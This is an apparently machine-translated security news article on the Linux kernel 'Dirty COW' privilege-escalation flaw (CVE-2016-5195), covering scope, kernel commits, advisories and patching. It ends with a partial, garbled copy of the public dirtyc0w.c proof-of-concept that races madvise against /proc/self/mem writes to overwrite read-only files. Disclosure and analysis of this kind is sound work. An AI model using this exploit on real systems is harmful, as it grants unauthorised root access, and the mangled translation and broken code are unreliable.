! [](/Article/UploadPic/2016-10/2 0 1 6 1 0 2 1 1 8 0 4 3 1 1. png? www. myhack58. com)
Vulnerability description
Vulnerability ID: CVE-2 0 1 6-5 1 9 5
Vulnerability name: dirty cow（Dirty COW）
Vulnerability to hazards: a low-rights user can use the vulnerability in the full version of the Linux system implemented on a local mention of the right to
Impact scope: The Linux kernel>=2.6.22 for 2 0 0 7 annual offerings beginning on the affected, until the 2 0 1 6 years 1 0 months 1 8 days to repair.
3 6 0 Vulpecker Team: Android 7. 0 latest 1 0 On patch the security level of the system on test through vulnerability POC, confirm that the Android affected
Why is this vulnerability called dirty cattle（Dirty COW）vulnerability?
The Linux kernel’s memory subsystem in a processing-on-write copies the Copy-on-Write)when the existence conditions of competitive vulnerability, the result can be destruction of private read-only memory mapping. A low-privileged local user can exploit this vulnerability to obtain additional read-only memory-mapped write permission, it is possible to lead to further mention the right vulnerability.
Vulnerability details
Vulnerability details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
According to the RedHat company reports: the current has been found in the wild for this vulnerability the use of technology. But so far, we have no further news.
https://access.redhat.com/security/vulnerabilities/2706661
Commit messages:
commit 4ceb5db9757aaeadcf8fbbf97d76bd42aa4df0d6
Author: Linus Torvalds
Date: Mon Aug 1 1 1:1 4:4 9 2 0 0 5 -0700
Fix get_user_pages()with write access to the competitive conditions
If an update from the other end of the thread to modify the page table, the handle_mm_fault()will likely end the need for us to re-operation. handle_mm_fault()is no real protection has been able to destroy the COW on. This look is nice, but get_user_pages()after the end of the re-read, so that get_user_pages()has been rewritten, need dirty bit is set, the most simple solution to the competitive conditions of the approach is that if the COW break for some reason fails, we can continue the cycle to continue to try.
commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619
Author: Linus Torvalds
Date: Thu Oct 1 3 2 0:0 7:3 6 2 0 1 6 GMT
This is an age-old BUG, I was in 7 years ago already tried to fix once before a commit 4ceb5db9757a, but due to some issues commit f33ea7f404e5 and roll back. This time, we pte_dirty()bit to do the testing.
Linux is the release version for the vulnerability related information
Red Hat: The https://access.redhat.com/security/cve/cve-2016-5195
Debian: the https://security-tracker.debian.org/tracker/CVE-2016-5195
Ubuntu: the http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html
The affected area
This vulnerability since kernel 2. 6. 2 2 of 2 0 0 7 annual offerings beginning on the affected, until the 2 0 1 6 years 1 0 months 1 8 days to repair.
How to fix the vulnerability?
The Linux team is working actively to fix this vulnerability, update to the latest release fix this vulnerability. Software developers can also
https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/it? id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619
Re-compile Linux to fix this vulnerability.
How to find someone using the exploit to attack me?
The use of this Bug is not in the log in the left exception information. But part of the security community has been to deploy a honeypot, if an attacker exploited this vulnerability, it will trigger the alarm.
Who found this vulnerability?
Phil Oester （https://access.redhat.com/security/cve/CVE-2016-5195）
For the vulnerability the author even application Independent: the website, twitter account, github account, and looking for someone to design a Logo
The author of this explanation is: we build brands vulnerability is full of fun, but maybe at this point in time, this is not a good idea. But in order to show our position, I only create a website, online shop, twiiter account, as well as ask a professional designer for this vulnerability to design a LOGO.
2016.10.21 1 3:3 7 update vulnerability scope:
3 6 0 Vulpecker Team: Android 7. 0 latest 1 0 On patch the security level of the system on test through vulnerability POC, confirm that the Android affected
! [](/Article/UploadPic/2016-10/2 0 1 6 1 0 2 1 1 8 0 4 1 2 4. png? www. myhack58. com)
2016.10.21 9:1 0 update POC of:
POC address:
https://github.com/dirtycow/dirtycow.github.io/blob/master/dirtyc0w.c
/*
####################### dirtyc0w. c#######################
$ sudo-s

echo this is not a test > foo

chmod 0 4 0 4 foo

$ ls-lah foo
-r-----r-- 1 root root 1 9 Oct 2 0 1 5:2 3 foo
$ cat foo
this is not a test
$ gcc-lpthread dirtyc0w. c-o dirtyc0w
$ ./ dirtyc0w foo m00000000000000000
mmap 5 6 1 2 3 0 0 0
madvise 0
procselfmem 1 8 0 0 0 0 0 0 0 0
$ cat foo
m00000000000000000
####################### dirtyc0w. c#######################
*/
#include
#include
#include
#include
#include

void *map;
int f;
struct stat st;
char *name;

void *madviseThread(void arg)
{
char str;
str=(char)arg;
int i,c=0;
for(i=0;i
{
/
You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
> This is achieved by racing the madvise(MADV_DONTNEED) system call
> while having the page of the executable mmapped in memory.
*/
c+=madvise(map,1 0 0,MADV_DONTNEED);
}
printf(“madvise %d\n\n”,c);
}

void *procselfmemThread(void arg)
{
char str;
str=(char)arg;
/
You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
> The in the wild exploit we are aware of doesn’t work on Red Hat

[1] [2] next